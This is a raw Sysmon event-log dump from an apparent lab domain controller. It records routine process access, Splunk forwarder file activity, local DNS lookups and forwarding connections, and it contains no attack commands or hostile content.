10341000x80000000000000002247192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.015{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6ED8-603E-1CAB-00000000AD01}9980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.015{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.015{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.015{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.015{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6ED8-603E-1CAB-00000000AD01}9980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002247187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.015{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002247186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.015{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6ED8-603E-1CAB-00000000AD01}9980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002247185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.017{05ADC7E1-6ED8-603E-1CAB-00000000AD01}9980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002247207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:05.663{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F38102EBA1846C40F549F7B6D63594CF,SHA256=32CC41837BA298F966163CED3E5C30D0165641D3C851631600D6ADA67C33901B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:55.139{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53264- 23542300x80000000000000002247205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:05.015{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4730F086830A3C0F4877906987801FD3,SHA256=1F6CB15E8B64637F87FD34A42801D30598FDAAB112B61A8D49E6959D9FF4E29A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:06.687{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=241918727D60611B319929E877EB5356,SHA256=F6E2826F836DD363D65339E20CECA6176DDDAAC3027CDBA868923B133A819F56,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:56.154{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local53264- 23542300x80000000000000002247208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:06.030{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF8E0DACE2168BCFF7F7BB332D729EDD,SHA256=445B68D962A37BAE0F8B0F279122D5B1696911D2891228A9F617BABC07A5E0EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:07.749{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52667D6D20E40796B1349CB9440F999C,SHA256=325BF808F745CA4229617D3104E83377C16C95AEF4D8AEBEC6ED067008160260,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:57.405{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53196- 23542300x80000000000000002247211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:07.312{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C17F64F472FE9D85BB9150319214A90D,SHA256=19D6B2179EF37AFE9C75DE770ACC46D5A1B54B9D31520077B03CE8D9507B2C31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:08.749{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A2FDA712201B7C969D8B6354A45E83A,SHA256=E30E4F86A73FEFF07EFD041A38402BA2A7410BE757BAE388A3FCECDA7CE0E151,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:09.768{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E3058197DB97D9B75503984A115403E,SHA256=868692F352BF586F9800DFF894D6EA87D12BB9A6B2013CAC8E0D107333D1D10D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:59.327{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60236-false10.0.1.12-8000- 354300x80000000000000002247216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:58.404{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local53196- 23542300x80000000000000002247215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:09.109{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54EF6E701FE44600DF564F12F5D4120B,SHA256=49179BB99CD8B3DF364F7EE8A72EFF311D91028492FEF4FA619F595F56358260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:10.781{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B89FB999DBBA0D176043A7E33657B412,SHA256=0D57499090E16174352417E2490435973D00A45D83C2F394E79A3AD036D6B308,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:11.812{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A455094D570EF8ECAC7673E76AF2D2CC,SHA256=BE679F44EE39A0714097359E1B23F1A704E9BF742287C47203BB162E4B14A137,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:12.843{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C391E6252740E93ECAE4F24243B1B68,SHA256=88EACCFE1389EAE7B0CB39E371FF4F1D61694859B369C31154BE8CA51FE27278,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:12.046{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A32E1FC297462C9907A29F233B6CA210,SHA256=42F0AD5C963987E45B6964BAA2F28F0AC0B3E7C2ACF1DF781100796CE41672E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:13.863{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F91036CC0B41214CD85A586A26A3BA4,SHA256=1F03BE9A47508B01FB683BC16E0D061D9C2ABF7D9488DD681E4603422235F2BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:13.124{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12A045785C757C8525C0E2317BA570AC,SHA256=2EAE1516952ECFF6A2F42D541BAB0F3D7943477E6B2A6D74D0716E00EDE95016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:14.890{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00C9A98CCCD5E01BA7797527FAC7A7C1,SHA256=8A5E2975F15D26C5151838028A267F77F4BAA4F09DB8776F8E3952F65FF5E2F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:04.327{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60237-false10.0.1.12-8000- 23542300x80000000000000002247225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:14.218{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=378803A51C339380EB7F313D5325DF2F,SHA256=3754189F17F915BE96B37B6A267B801D27311C13F60817641D3EC19C702222E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:15.921{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEB9E0706697D70757A917A4659C9D82,SHA256=170CB1C5D52B90E632C9B60C070E2CA6D228BD08C0957308E3AB95798F483DFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:15.343{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C12EC0487F56DFBA06412F90EA083103,SHA256=B57DC7F55BCAEAEDF8391FA21C10142F22D2C0885498FB5398732B566EB45781,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:16.937{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FA8C765092BE872BDA099458C53DC7A,SHA256=4008803D0476A90AA53C11EA338423AE75F8310CF21FFD683B01F4768197AD96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:17.955{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=864137ED94C27E6172E3C0F040F1258A,SHA256=AED2B51D91CCE7643A69832829F4B93EE7227B3D9FBA7981D0C25D583E7CCED6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:18.968{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A50301006E1CA06A3676FE65C66B4463,SHA256=5438ABBFDB5C0A6B5111C84D7EB5E2A0C4BC3777E39A745BD5929AD489E55624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:19.984{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DEF9B49DEFDBB44FCB31026DFAE7E75,SHA256=1DAC23EEE341254EF292ED0EC87173B63BE3A750E01BA1C7BC8228B30F7897C2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:09.405{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60238-false10.0.1.12-8000- 23542300x80000000000000002247233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:19.281{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D900D028AA63D0DA0A8A7573F6F0F2FD,SHA256=7B39A0892EA322CD19E41D03F0FFE79F865D60A554B7A4FFDD78BBED2C1D3C6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:09.889{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local50005- 23542300x80000000000000002247236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:20.640{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA25D11EA4D9E19956748752559D5045,SHA256=6B2AAB7DA5FE7CA0541FD405EF47163699BBF10B364F116B549E4DB33BCC0547,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:11.779{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local63816- 354300x80000000000000002247240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:10.904{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local50005- 23542300x80000000000000002247239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:21.659{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0233F4D3BAEEA83E39923B6A93203C97,SHA256=BBF4F02FB627CE593F07143856D20FB199ECFDF16913313295C05A045F318924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:21.046{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1575BFD9F1F40F39233E28A19E7CF14C,SHA256=1A639D305FE94D9597EA070685E5BC9BACB9B01CF2DBD3C38EDC41548328C396,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:22.109{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E62735919E5A3CF71ADC8A56A41CFA63,SHA256=9128A9B113D7C01014A56E23DB3271FA6C7A00B4E294DE2731CAE563B7D9691F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:23.812{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF90ADD6BDA67BAE7AA819FDD0284E2B,SHA256=C3C99AEC6512229EC6E9F99A30564014369192F4C5AC15FD361A7BED5220AA21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:23.124{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 